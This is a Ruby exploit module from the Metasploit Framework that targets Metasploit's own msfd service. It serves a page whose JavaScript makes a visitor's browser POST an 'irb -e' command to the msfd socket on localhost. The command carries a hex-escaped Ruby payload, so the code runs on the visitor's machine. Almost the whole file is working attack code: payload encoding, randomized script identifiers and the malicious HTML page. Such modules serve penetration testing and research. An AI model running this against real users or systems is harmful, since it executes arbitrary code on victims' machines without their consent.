GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/msfd_rce_browser.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Framework ranking for this module.
  Rank = NormalRanking
  # HTTP-server mixin: it supplies send_response and the exploit method that
  # starts the listener, and invokes on_request_uri for each request served.
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata and the two datastore options that
  # on_request_uri reads when building the served page.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit msfd Remote Code Execution via Browser',
        # NOTE(review): the text below says 'rbi -e'; the command the served
        # page actually sends is `irb -e "CODE"` (see on_request_uri).
        'Description' => %q{
          Metasploit's msfd-service makes it possible to get a msfconsole-like
          interface over a TCP socket. This module connects to the msfd-socket
          through the victim's browser.

          To execute msfconsole-commands in JavaScript from a web application,
          this module places the payload in the POST-data. These POST-requests
          can be sent cross-domain and can therefore be sent to localhost on the
          victim's machine. The msfconsole-command to execute code is 'rbi -e
          "CODE"'.

          Exploitation when the browser is running on Windows is unreliable and
          the exploit is only usable when IE is used and the quiet-flag has been
          passed to msf-daemon.
        },
        'License' => BSD_LICENSE,
        'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
        # The payload is Ruby source; on_request_uri hands it to irb on the msfd side.
        'Platform' => 'ruby',
        'Arch' => ARCH_RUBY,
        'Targets' => [
          [ 'Automatic', {}],
        ],
        'Payload' => {
          'Space' => 8192, # Arbitrary limit
          'DisableNops' => true,
          # Double quote and newline are excluded because on_request_uri wraps the
          # payload in "..." and terminates the command line with "\n".
          'BadChars' => "\x22\x0a"
        },
        'DisclosureDate' => '2018-04-11', # Vendor notification
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Address and port the victim's browser will POST to. The defaults point at
    # an msfd listener on the victim's own loopback interface, which is why the
    # request is issued from the browser rather than from this module.
    register_options([
      OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
      OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
    ])
  end

  # Starts the HTTP listener provided by the HttpServer mixin; this override
  # only delegates to it.
  def exploit
    super
  end

  # Serves the page that makes the victim's browser POST the payload to msfd.
  #
  # Defensive note: the page sends the msfconsole command with no credentials,
  # so any msfd socket a browser can reach is exposed this way; the underlying
  # issue is an msfd listener reachable from a browser on the same host.
  #
  # @param cli [Object] connected client; only peerhost is read, for the log line
  # @param request [Object] the HTTP request; unused, so every URI gets the same page
  # @return [void]
  def on_request_uri(cli, request)
    # Log prefix: client address padded to 16 columns plus the module shortname.
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
    sc = payload.encoded
    # Rewrite the encoded payload as a JavaScript string of \x escapes:
    # unpack('U' ...) yields code points, each rendered with to_s(16) and
    # prefixed with \x.
    shellcode = "\\x" + sc.unpack('U' * sc.length).collect { |x| x.to_s 16 }.join("\\x")
    # Random identifiers (6-11 letters) for the XHR object and the payload string.
    var1 = rand_text_alpha(rand(6..11))
    var2 = rand_text_alpha(rand(6..11))
    # Page body: an XMLHttpRequest POST to REMOTE_IP:REMOTE_PORT whose body is
    # the msfconsole command `irb -e "<payload>"` followed by a newline. The
    # page never reads the response.
    html = <<~EOS
      <html>
      <head></head>
      <body>
      <script>
      var #{var1} = new XMLHttpRequest();
      #{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
      var #{var2} = String("#{shellcode}");
      #{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
      </script>
      </body>
      </html>
    EOS
    print_status("#{msg} Sending HTML...")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end